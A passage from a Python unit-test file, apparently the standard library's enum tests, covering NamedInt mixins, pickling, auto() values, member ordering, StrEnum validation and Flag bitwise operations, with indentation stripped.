class NEI(NamedInt, Enum):
__qualname__ = 'NEI'
x = ('the-x', 1)
y = ('the-y', 2)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_exception(self.assertRaises, TypeError, NEI.x)
test_pickle_exception(self.assertRaises, PicklingError, NEI)
def test_subclasses_without_direct_pickle_support_using_name(self):
class NamedInt(int):
__qualname__ = 'NamedInt'
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(
type(self).__name__,
self.__name__,
int.__repr__(self),
)
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
                temp = int(self) + int(other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp,
)
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI'
x = ('the-x', 1)
y = ('the-y', 2)
def __reduce_ex__(self, proto):
return getattr, (self.__class__, self._name_)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
def test_tuple_subclass(self):
class SomeTuple(tuple, Enum):
__qualname__ = 'SomeTuple' # needed for pickle protocol 4
first = (1, 'for the money')
second = (2, 'for the show')
third = (3, 'for the music')
self.assertIs(type(SomeTuple.first), SomeTuple)
self.assertIsInstance(SomeTuple.second, tuple)
self.assertEqual(SomeTuple.third, (3, 'for the music'))
globals()['SomeTuple'] = SomeTuple
test_pickle_dump_load(self.assertIs, SomeTuple.first)
def test_duplicate_values_give_unique_enum_items(self):
class AutoNumber(Enum):
first = ()
second = ()
third = ()
def __new__(cls):
value = len(cls.__members__) + 1
obj = object.__new__(cls)
obj._value_ = value
return obj
def __int__(self):
return int(self._value_)
self.assertEqual(
list(AutoNumber),
[AutoNumber.first, AutoNumber.second, AutoNumber.third],
)
self.assertEqual(int(AutoNumber.second), 2)
self.assertEqual(AutoNumber.third.value, 3)
self.assertIs(AutoNumber(1), AutoNumber.first)
def test_inherited_new_from_enhanced_enum(self):
class AutoNumber(Enum):
def __new__(cls):
value = len(cls.__members__) + 1
obj = object.__new__(cls)
obj._value_ = value
return obj
def __int__(self):
return int(self._value_)
class Color(AutoNumber):
red = ()
green = ()
blue = ()
self.assertEqual(list(Color), [Color.red, Color.green, Color.blue])
self.assertEqual(list(map(int, Color)), [1, 2, 3])
def test_inherited_new_from_mixed_enum(self):
class AutoNumber(IntEnum):
def __new__(cls):
value = len(cls.__members__) + 1
obj = int.__new__(cls, value)
obj._value_ = value
return obj
class Color(AutoNumber):
red = ()
green = ()
blue = ()
self.assertEqual(list(Color), [Color.red, Color.green, Color.blue])
self.assertEqual(list(map(int, Color)), [1, 2, 3])
def test_equality(self):
class OrdinaryEnum(Enum):
a = 1
self.assertEqual(ALWAYS_EQ, OrdinaryEnum.a)
self.assertEqual(OrdinaryEnum.a, ALWAYS_EQ)
def test_ordered_mixin(self):
class OrderedEnum(Enum):
def __ge__(self, other):
if self.__class__ is other.__class__:
return self._value_ >= other._value_
return NotImplemented
def __gt__(self, other):
if self.__class__ is other.__class__:
return self._value_ > other._value_
return NotImplemented
def __le__(self, other):
if self.__class__ is other.__class__:
return self._value_ <= other._value_
return NotImplemented
def __lt__(self, other):
if self.__class__ is other.__class__:
return self._value_ < other._value_
return NotImplemented
class Grade(OrderedEnum):
A = 5
B = 4
C = 3
D = 2
F = 1
self.assertGreater(Grade.A, Grade.B)
self.assertLessEqual(Grade.F, Grade.C)
self.assertLess(Grade.D, Grade.A)
self.assertGreaterEqual(Grade.B, Grade.B)
self.assertEqual(Grade.B, Grade.B)
self.assertNotEqual(Grade.C, Grade.D)
def test_extending2(self):
class Shade(Enum):
def shade(self):
print(self.name)
class Color(Shade):
red = 1
green = 2
blue = 3
with self.assertRaises(TypeError):
class MoreColor(Color):
cyan = 4
magenta = 5
yellow = 6
def test_extending3(self):
class Shade(Enum):
def shade(self):
return self.name
class Color(Shade):
def hex(self):
return '%s hexlified!' % self.value
class MoreColor(Color):
cyan = 4
magenta = 5
yellow = 6
self.assertEqual(MoreColor.magenta.hex(), '5 hexlified!')
def test_subclass_duplicate_name(self):
class Base(Enum):
def test(self):
pass
class Test(Base):
test = 1
self.assertIs(type(Test.test), Test)
def test_subclass_duplicate_name_dynamic(self):
from types import DynamicClassAttribute
class Base(Enum):
@DynamicClassAttribute
def test(self):
return 'dynamic'
class Test(Base):
test = 1
self.assertEqual(Test.test.test, 'dynamic')
def test_no_duplicates(self):
class UniqueEnum(Enum):
def __init__(self, *args):
cls = self.__class__
if any(self.value == e.value for e in cls):
a = self.name
e = cls(self.value).name
raise ValueError(
"aliases not allowed in UniqueEnum: %r --> %r"
% (a, e)
)
class Color(UniqueEnum):
red = 1
green = 2
blue = 3
with self.assertRaises(ValueError):
class Color(UniqueEnum):
red = 1
green = 2
blue = 3
grene = 2
def test_init(self):
class Planet(Enum):
MERCURY = (3.303e+23, 2.4397e6)
VENUS = (4.869e+24, 6.0518e6)
EARTH = (5.976e+24, 6.37814e6)
MARS = (6.421e+23, 3.3972e6)
JUPITER = (1.9e+27, 7.1492e7)
SATURN = (5.688e+26, 6.0268e7)
URANUS = (8.686e+25, 2.5559e7)
NEPTUNE = (1.024e+26, 2.4746e7)
def __init__(self, mass, radius):
self.mass = mass # in kilograms
self.radius = radius # in meters
@property
def surface_gravity(self):
# universal gravitational constant (m3 kg-1 s-2)
G = 6.67300E-11
return G * self.mass / (self.radius * self.radius)
self.assertEqual(round(Planet.EARTH.surface_gravity, 2), 9.80)
self.assertEqual(Planet.EARTH.value, (5.976e+24, 6.37814e6))
def test_ignore(self):
class Period(timedelta, Enum):
'''
different lengths of time
'''
def __new__(cls, value, period):
obj = timedelta.__new__(cls, value)
obj._value_ = value
obj.period = period
return obj
_ignore_ = 'Period i'
Period = vars()
for i in range(13):
Period['month_%d' % i] = i*30, 'month'
for i in range(53):
Period['week_%d' % i] = i*7, 'week'
for i in range(32):
Period['day_%d' % i] = i, 'day'
OneDay = day_1
OneWeek = week_1
OneMonth = month_1
self.assertFalse(hasattr(Period, '_ignore_'))
self.assertFalse(hasattr(Period, 'Period'))
self.assertFalse(hasattr(Period, 'i'))
self.assertTrue(isinstance(Period.day_1, timedelta))
self.assertTrue(Period.month_1 is Period.day_30)
self.assertTrue(Period.week_4 is Period.day_28)
def test_nonhash_value(self):
class AutoNumberInAList(Enum):
def __new__(cls):
value = [len(cls.__members__) + 1]
obj = object.__new__(cls)
obj._value_ = value
return obj
class ColorInAList(AutoNumberInAList):
red = ()
green = ()
blue = ()
self.assertEqual(list(ColorInAList), [ColorInAList.red, ColorInAList.green, ColorInAList.blue])
for enum, value in zip(ColorInAList, range(3)):
value += 1
self.assertEqual(enum.value, [value])
self.assertIs(ColorInAList([value]), enum)
def test_conflicting_types_resolved_in_new(self):
class LabelledIntEnum(int, Enum):
def __new__(cls, *args):
value, label = args
obj = int.__new__(cls, value)
obj.label = label
obj._value_ = value
return obj
class LabelledList(LabelledIntEnum):
unprocessed = (1, "Unprocessed")
payment_complete = (2, "Payment Complete")
self.assertEqual(list(LabelledList), [LabelledList.unprocessed, LabelledList.payment_complete])
self.assertEqual(LabelledList.unprocessed, 1)
self.assertEqual(LabelledList(1), LabelledList.unprocessed)
def test_auto_number(self):
class Color(Enum):
red = auto()
blue = auto()
green = auto()
self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
self.assertEqual(Color.red.value, 1)
self.assertEqual(Color.blue.value, 2)
self.assertEqual(Color.green.value, 3)
def test_auto_name(self):
class Color(Enum):
def _generate_next_value_(name, start, count, last):
return name
red = auto()
blue = auto()
green = auto()
self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
self.assertEqual(Color.red.value, 'red')
self.assertEqual(Color.blue.value, 'blue')
self.assertEqual(Color.green.value, 'green')
def test_auto_name_inherit(self):
class AutoNameEnum(Enum):
def _generate_next_value_(name, start, count, last):
return name
class Color(AutoNameEnum):
red = auto()
blue = auto()
green = auto()
self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
self.assertEqual(Color.red.value, 'red')
self.assertEqual(Color.blue.value, 'blue')
self.assertEqual(Color.green.value, 'green')
def test_auto_garbage(self):
class Color(Enum):
red = 'red'
blue = auto()
self.assertEqual(Color.blue.value, 1)
def test_auto_garbage_corrected(self):
class Color(Enum):
red = 'red'
blue = 2
green = auto()
self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
self.assertEqual(Color.red.value, 'red')
self.assertEqual(Color.blue.value, 2)
self.assertEqual(Color.green.value, 3)
def test_auto_order(self):
with self.assertRaises(TypeError):
class Color(Enum):
red = auto()
green = auto()
blue = auto()
def _generate_next_value_(name, start, count, last):
return name
def test_auto_order_wierd(self):
weird_auto = auto()
weird_auto.value = 'pathological case'
class Color(Enum):
red = weird_auto
def _generate_next_value_(name, start, count, last):
return name
blue = auto()
self.assertEqual(list(Color), [Color.red, Color.blue])
self.assertEqual(Color.red.value, 'pathological case')
self.assertEqual(Color.blue.value, 'blue')
def test_duplicate_auto(self):
class Dupes(Enum):
first = primero = auto()
second = auto()
third = auto()
self.assertEqual([Dupes.first, Dupes.second, Dupes.third], list(Dupes))
def test_default_missing(self):
class Color(Enum):
RED = 1
GREEN = 2
BLUE = 3
try:
Color(7)
except ValueError as exc:
self.assertTrue(exc.__context__ is None)
else:
raise Exception('Exception not raised.')
def test_missing(self):
class Color(Enum):
red = 1
green = 2
blue = 3
@classmethod
def _missing_(cls, item):
if item == 'three':
return cls.blue
elif item == 'bad return':
# trigger internal error
return 5
elif item == 'error out':
raise ZeroDivisionError
else:
# trigger not found
return None
self.assertIs(Color('three'), Color.blue)
try:
Color(7)
except ValueError as exc:
self.assertTrue(exc.__context__ is None)
else:
raise Exception('Exception not raised.')
try:
Color('bad return')
except TypeError as exc:
self.assertTrue(isinstance(exc.__context__, ValueError))
else:
raise Exception('Exception not raised.')
try:
Color('error out')
except ZeroDivisionError as exc:
self.assertTrue(isinstance(exc.__context__, ValueError))
else:
raise Exception('Exception not raised.')
def test_multiple_mixin(self):
class MaxMixin:
@classproperty
def MAX(cls):
max = len(cls)
cls.MAX = max
return max
class StrMixin:
def __str__(self):
return self._name_.lower()
class SomeEnum(Enum):
def behavior(self):
return 'booyah'
class AnotherEnum(Enum):
def behavior(self):
return 'nuhuh!'
def social(self):
return "what's up?"
class Color(MaxMixin, Enum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 3)
self.assertEqual(Color.MAX, 3)
self.assertEqual(str(Color.BLUE), 'Color.BLUE')
class Color(MaxMixin, StrMixin, Enum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 3)
self.assertEqual(Color.MAX, 3)
self.assertEqual(str(Color.BLUE), 'blue')
class Color(StrMixin, MaxMixin, Enum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 3)
self.assertEqual(Color.MAX, 3)
self.assertEqual(str(Color.BLUE), 'blue')
class CoolColor(StrMixin, SomeEnum, Enum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(CoolColor.RED.value, 1)
self.assertEqual(CoolColor.GREEN.value, 2)
self.assertEqual(CoolColor.BLUE.value, 3)
self.assertEqual(str(CoolColor.BLUE), 'blue')
self.assertEqual(CoolColor.RED.behavior(), 'booyah')
class CoolerColor(StrMixin, AnotherEnum, Enum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(CoolerColor.RED.value, 1)
self.assertEqual(CoolerColor.GREEN.value, 2)
self.assertEqual(CoolerColor.BLUE.value, 3)
self.assertEqual(str(CoolerColor.BLUE), 'blue')
self.assertEqual(CoolerColor.RED.behavior(), 'nuhuh!')
self.assertEqual(CoolerColor.RED.social(), "what's up?")
class CoolestColor(StrMixin, SomeEnum, AnotherEnum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(CoolestColor.RED.value, 1)
self.assertEqual(CoolestColor.GREEN.value, 2)
self.assertEqual(CoolestColor.BLUE.value, 3)
self.assertEqual(str(CoolestColor.BLUE), 'blue')
self.assertEqual(CoolestColor.RED.behavior(), 'booyah')
self.assertEqual(CoolestColor.RED.social(), "what's up?")
class ConfusedColor(StrMixin, AnotherEnum, SomeEnum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(ConfusedColor.RED.value, 1)
self.assertEqual(ConfusedColor.GREEN.value, 2)
self.assertEqual(ConfusedColor.BLUE.value, 3)
self.assertEqual(str(ConfusedColor.BLUE), 'blue')
self.assertEqual(ConfusedColor.RED.behavior(), 'nuhuh!')
self.assertEqual(ConfusedColor.RED.social(), "what's up?")
class ReformedColor(StrMixin, IntEnum, SomeEnum, AnotherEnum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(ReformedColor.RED.value, 1)
self.assertEqual(ReformedColor.GREEN.value, 2)
self.assertEqual(ReformedColor.BLUE.value, 3)
self.assertEqual(str(ReformedColor.BLUE), 'blue')
self.assertEqual(ReformedColor.RED.behavior(), 'booyah')
self.assertEqual(ConfusedColor.RED.social(), "what's up?")
self.assertTrue(issubclass(ReformedColor, int))
def test_multiple_inherited_mixin(self):
@unique
class Decision1(StrEnum):
REVERT = "REVERT"
REVERT_ALL = "REVERT_ALL"
RETRY = "RETRY"
class MyEnum(StrEnum):
pass
@unique
class Decision2(MyEnum):
REVERT = "REVERT"
REVERT_ALL = "REVERT_ALL"
RETRY = "RETRY"
def test_empty_globals(self):
# bpo-35717: sys._getframe(2).f_globals['__name__'] fails with KeyError
# when using compile and exec because f_globals is empty
code = "from enum import Enum; Enum('Animal', 'ANT BEE CAT DOG')"
code = compile(code, "<string>", "exec")
global_ns = {}
local_ls = {}
exec(code, global_ns, local_ls)
def test_strenum(self):
class GoodStrEnum(StrEnum):
one = '1'
two = '2'
three = b'3', 'ascii'
four = b'4', 'latin1', 'strict'
self.assertEqual(GoodStrEnum.one, '1')
self.assertEqual(str(GoodStrEnum.one), '1')
self.assertEqual(GoodStrEnum.one, str(GoodStrEnum.one))
self.assertEqual(GoodStrEnum.one, '{}'.format(GoodStrEnum.one))
#
class DumbMixin:
def __str__(self):
return "don't do this"
class DumbStrEnum(DumbMixin, StrEnum):
five = '5'
six = '6'
seven = '7'
self.assertEqual(DumbStrEnum.seven, '7')
self.assertEqual(str(DumbStrEnum.seven), "don't do this")
#
class EnumMixin(Enum):
def hello(self):
print('hello from %s' % (self, ))
class HelloEnum(EnumMixin, StrEnum):
eight = '8'
self.assertEqual(HelloEnum.eight, '8')
self.assertEqual(HelloEnum.eight, str(HelloEnum.eight))
#
class GoodbyeMixin:
def goodbye(self):
                print('%s wishes you a fond farewell' % (self, ))
class GoodbyeEnum(GoodbyeMixin, EnumMixin, StrEnum):
nine = '9'
self.assertEqual(GoodbyeEnum.nine, '9')
self.assertEqual(GoodbyeEnum.nine, str(GoodbyeEnum.nine))
#
with self.assertRaisesRegex(TypeError, '1 is not a string'):
class FirstFailedStrEnum(StrEnum):
one = 1
two = '2'
with self.assertRaisesRegex(TypeError, "2 is not a string"):
class SecondFailedStrEnum(StrEnum):
one = '1'
two = 2,
three = '3'
with self.assertRaisesRegex(TypeError, '2 is not a string'):
class ThirdFailedStrEnum(StrEnum):
one = '1'
two = 2
with self.assertRaisesRegex(TypeError, 'encoding must be a string, not %r' % (sys.getdefaultencoding, )):
class ThirdFailedStrEnum(StrEnum):
one = '1'
two = b'2', sys.getdefaultencoding
with self.assertRaisesRegex(TypeError, 'errors must be a string, not 9'):
class ThirdFailedStrEnum(StrEnum):
one = '1'
two = b'2', 'ascii', 9
class TestOrder(unittest.TestCase):
def test_same_members(self):
class Color(Enum):
_order_ = 'red green blue'
red = 1
green = 2
blue = 3
def test_same_members_with_aliases(self):
class Color(Enum):
_order_ = 'red green blue'
red = 1
green = 2
blue = 3
verde = green
def test_same_members_wrong_order(self):
with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
class Color(Enum):
_order_ = 'red green blue'
red = 1
blue = 3
green = 2
def test_order_has_extra_members(self):
with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
class Color(Enum):
_order_ = 'red green blue purple'
red = 1
green = 2
blue = 3
def test_order_has_extra_members_with_aliases(self):
with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
class Color(Enum):
_order_ = 'red green blue purple'
red = 1
green = 2
blue = 3
verde = green
def test_enum_has_extra_members(self):
with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
class Color(Enum):
_order_ = 'red green blue'
red = 1
green = 2
blue = 3
purple = 4
def test_enum_has_extra_members_with_aliases(self):
with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
class Color(Enum):
_order_ = 'red green blue'
red = 1
green = 2
blue = 3
purple = 4
verde = green
class TestFlag(unittest.TestCase):
"""Tests of the Flags."""
class Perm(Flag):
R, W, X = 4, 2, 1
class Open(Flag):
RO = 0
WO = 1
RW = 2
AC = 3
CE = 1<<19
class Color(Flag):
BLACK = 0
RED = 1
GREEN = 2
BLUE = 4
PURPLE = RED|BLUE
def test_str(self):
Perm = self.Perm
self.assertEqual(str(Perm.R), 'Perm.R')
self.assertEqual(str(Perm.W), 'Perm.W')
self.assertEqual(str(Perm.X), 'Perm.X')
self.assertEqual(str(Perm.R | Perm.W), 'Perm.R|W')
self.assertEqual(str(Perm.R | Perm.W | Perm.X), 'Perm.R|W|X')
self.assertEqual(str(Perm(0)), 'Perm.0')
self.assertEqual(str(~Perm.R), 'Perm.W|X')
self.assertEqual(str(~Perm.W), 'Perm.R|X')
self.assertEqual(str(~Perm.X), 'Perm.R|W')
self.assertEqual(str(~(Perm.R | Perm.W)), 'Perm.X')
self.assertEqual(str(~(Perm.R | Perm.W | Perm.X)), 'Perm.0')
self.assertEqual(str(Perm(~0)), 'Perm.R|W|X')
Open = self.Open
self.assertEqual(str(Open.RO), 'Open.RO')
self.assertEqual(str(Open.WO), 'Open.WO')
self.assertEqual(str(Open.AC), 'Open.AC')
self.assertEqual(str(Open.RO | Open.CE), 'Open.CE')
self.assertEqual(str(Open.WO | Open.CE), 'Open.CE|WO')
self.assertEqual(str(~Open.RO), 'Open.CE|AC|RW|WO')
self.assertEqual(str(~Open.WO), 'Open.CE|RW')
self.assertEqual(str(~Open.AC), 'Open.CE')
self.assertEqual(str(~(Open.RO | Open.CE)), 'Open.AC')
self.assertEqual(str(~(Open.WO | Open.CE)), 'Open.RW')
def test_repr(self):
Perm = self.Perm
self.assertEqual(repr(Perm.R), '<Perm.R: 4>')
self.assertEqual(repr(Perm.W), '<Perm.W: 2>')
self.assertEqual(repr(Perm.X), '<Perm.X: 1>')
self.assertEqual(repr(Perm.R | Perm.W), '<Perm.R|W: 6>')
self.assertEqual(repr(Perm.R | Perm.W | Perm.X), '<Perm.R|W|X: 7>')
self.assertEqual(repr(Perm(0)), '<Perm.0: 0>')
self.assertEqual(repr(~Perm.R), '<Perm.W|X: 3>')
self.assertEqual(repr(~Perm.W), '<Perm.R|X: 5>')
self.assertEqual(repr(~Perm.X), '<Perm.R|W: 6>')
self.assertEqual(repr(~(Perm.R | Perm.W)), '<Perm.X: 1>')
self.assertEqual(repr(~(Perm.R | Perm.W | Perm.X)), '<Perm.0: 0>')
self.assertEqual(repr(Perm(~0)), '<Perm.R|W|X: 7>')
Open = self.Open
self.assertEqual(repr(Open.RO), '<Open.RO: 0>')
self.assertEqual(repr(Open.WO), '<Open.WO: 1>')
self.assertEqual(repr(Open.AC), '<Open.AC: 3>')
self.assertEqual(repr(Open.RO | Open.CE), '<Open.CE: 524288>')
self.assertEqual(repr(Open.WO | Open.CE), '<Open.CE|WO: 524289>')
self.assertEqual(repr(~Open.RO), '<Open.CE|AC|RW|WO: 524291>')
self.assertEqual(repr(~Open.WO), '<Open.CE|RW: 524290>')
self.assertEqual(repr(~Open.AC), '<Open.CE: 524288>')
self.assertEqual(repr(~(Open.RO | Open.CE)), '<Open.AC: 3>')
self.assertEqual(repr(~(Open.WO | Open.CE)), '<Open.RW: 2>')
def test_or(self):
Perm = self.Perm
for i in Perm:
for j in Perm:
self.assertEqual((i | j), Perm(i.value | j.value))
self.assertEqual((i | j).value, i.value | j.value)
self.assertIs(type(i | j), Perm)
for i in Perm:
self.assertIs(i | i, i)
Open = self.Open
self.assertIs(Open.RO | Open.CE, Open.CE)
def test_and(self):
Perm = self.Perm
RW = Perm.R | Perm.W
RX = Perm.R | Perm.X
WX = Perm.W | Perm.X
RWX = Perm.R | Perm.W | Perm.X
values = list(Perm) + [RW, RX, WX, RWX, Perm(0)]
for i in values:
for j in values:
self.assertEqual((i & j).value, i.value & j.value)
self.assertIs(type(i & j), Perm)
for i in Perm:
self.assertIs(i & i, i)
self.assertIs(i & RWX, i)
self.assertIs(RWX & i, i)
Open = self.Open
self.assertIs(Open.RO & Open.CE, Open.RO)
def test_xor(self):
Perm = self.Perm
for i in Perm:
for j in Perm:
self.assertEqual((i ^ j).value, i.value ^ j.value)
self.assertIs(type(i ^ j), Perm)
for i in Perm:
self.assertIs(i ^ Perm(0), i)
self.assertIs(Perm(0) ^ i, i)
Open = self.Open
self.assertIs(Open.RO ^ Open.CE, Open.CE)
self.assertIs(Open.CE ^ Open.CE, Open.RO)
def test_invert(self):
Perm = self.Perm
RW = Perm.R | Perm.W
RX = Perm.R | Perm.X
WX = Perm.W | Perm.X
RWX = Perm.R | Perm.W | Perm.X
values = list(Perm) + [RW, RX, WX, RWX, Perm(0)]
for i in values:
self.assertIs(type(~i), Perm)
self.assertEqual(~~i, i)
for i in Perm:
self.assertIs(~~i, i)
Open = self.Open
self.assertIs(Open.WO & ~Open.WO, Open.RO)
self.assertIs((Open.WO|Open.CE) & ~Open.WO, Open.CE)
def test_bool(self):
Perm = self.Perm
for f in Perm:
self.assertTrue(f)
Open = self.Open
for f in Open:
self.assertEqual(bool(f.value), bool(f))
def test_programatic_function_string(self):
Perm = Flag('Perm', 'R W X')
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_string_with_start(self):
Perm = Flag('Perm', 'R W X', start=8)
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 8<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_string_list(self):
Perm = Flag('Perm', ['R', 'W', 'X'])
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_iterable(self):
Perm = Flag('Perm', (('R', 2), ('W', 8), ('X', 32)))
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<(2*i+1)
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_from_dict(self):
Perm = Flag('Perm', OrderedDict((('R', 2), ('W', 8), ('X', 32))))
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<(2*i+1)
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_pickle(self):
if isinstance(FlagStooges, Exception):
raise FlagStooges
test_pickle_dump_load(self.assertIs, FlagStooges.CURLY|FlagStooges.MOE)
test_pickle_dump_load(self.assertIs, FlagStooges)
def test_contains(self):
Open = self.Open
Color = self.Color
self.assertFalse(Color.BLACK in Open)
self.assertFalse(Open.RO in Color)
with self.assertRaises(TypeError):
'BLACK' in Color
with self.assertRaises(TypeError):
'RO' in Open
with self.assertRaises(TypeError):
1 in Color
with self.assertRaises(TypeError):
1 in Open
def test_member_contains(self):
Perm = self.Perm
R, W, X = Perm
RW = R | W
RX = R | X
WX = W | X
RWX = R | W | X
self.assertTrue(R in RW)
self.assertTrue(R in RX)
self.assertTrue(R in RWX)
self.assertTrue(W in RW)
self.assertTrue(W in WX)
self.assertTrue(W in RWX)
self.assertTrue(X in RX)
self.assertTrue(X in WX)
self.assertTrue(X in RWX)
self.assertFalse(R in WX)
self.assertFalse(W in RX)
self.assertFalse(X in RW)
def test_member_iter(self):
Color = self.Color
self.assertEqual(list(Color.PURPLE), [Color.BLUE, Color.RED])
self.assertEqual(list(Color.BLUE), [Color.BLUE])
self.assertEqual(list(Color.GREEN), [Color.GREEN])
def test_auto_number(self):
class Color(Flag):
red = auto()
blue = auto()
green = auto()
self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
self.assertEqual(Color.red.value, 1)
self.assertEqual(Color.blue.value, 2)
self.assertEqual(Color.green.value, 4)
def test_auto_number_garbage(self):
with self.assertRaisesRegex(TypeError, 'Invalid Flag value: .not an int.'):
class Color(Flag):
red = 'not an int'
blue = auto()
def test_cascading_failure(self):
class Bizarre(Flag):
c = 3
d = 4
f = 6
# Bizarre.c | Bizarre.d
name = "TestFlag.test_cascading_failure.<locals>.Bizarre"
self.assertRaisesRegex(ValueError, "5 is not a valid " + name, Bizarre, 5)
self.assertRaisesRegex(ValueError, "5 is not a valid " + name, Bizarre, 5)
self.assertRaisesRegex(ValueError, "2 is not a valid " + name, Bizarre, 2)
self.assertRaisesRegex(ValueError, "2 is not a valid " + name, Bizarre, 2)
self.assertRaisesRegex(ValueError, "1 is not a valid " + name, Bizarre, 1)
self.assertRaisesRegex(ValueError, "1 is not a valid " + name, Bizarre, 1)
def test_duplicate_auto(self):
class Dupes(Enum):
first = primero = auto()
second = auto()
third = auto()
self.assertEqual([Dupes.first, Dupes.second, Dupes.third], list(Dupes))
def test_bizarre(self):
class Bizarre(Flag):
b = 3
c = 4
d = 6
self.assertEqual(repr(Bizarre(7)), '<Bizarre.d|c|b: 7>')
def test_multiple_mixin(self):
class AllMixin:
@classproperty
def ALL(cls):
members = list(cls)
all_value = None
if members:
all_value = members[0]
for member in members[1:]:
all_value |= member
cls.ALL = all_value
return all_value
class StrMixin:
def __str__(self):
return self._name_.lower()
class Color(AllMixin, Flag):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 4)
self.assertEqual(Color.ALL.value, 7)
self.assertEqual(str(Color.BLUE), 'Color.BLUE')
class Color(AllMixin, StrMixin, Flag):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 4)
self.assertEqual(Color.ALL.value, 7)
self.assertEqual(str(Color.BLUE), 'blue')
class Color(StrMixin, AllMixin, Flag):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 4)
self.assertEqual(Color.ALL.value, 7)
self.assertEqual(str(Color.BLUE), 'blue')
@threading_helper.reap_threads
def test_unique_composite(self):
# override __eq__ to be identity only
class TestFlag(Flag):
one = auto()
two = auto()
three = auto()
four = auto()
five = auto()
six = auto()
seven = auto()
eight = auto()
def __eq__(self, other):
return self is other
def __hash__(self):
return hash(self._value_)
# have multiple threads competing to complete the composite members
seen = set()
failed = False
def cycle_enum():
nonlocal failed
try:
for i in range(256):
seen.add(TestFlag(i))
except Exception:
failed = True
threads = [
threading.Thread(target=cycle_enum)
for _ in range(8)
]
with threading_helper.start_threads(threads):
pass
# check that no thread failed and that, besides the 8 canonical members,
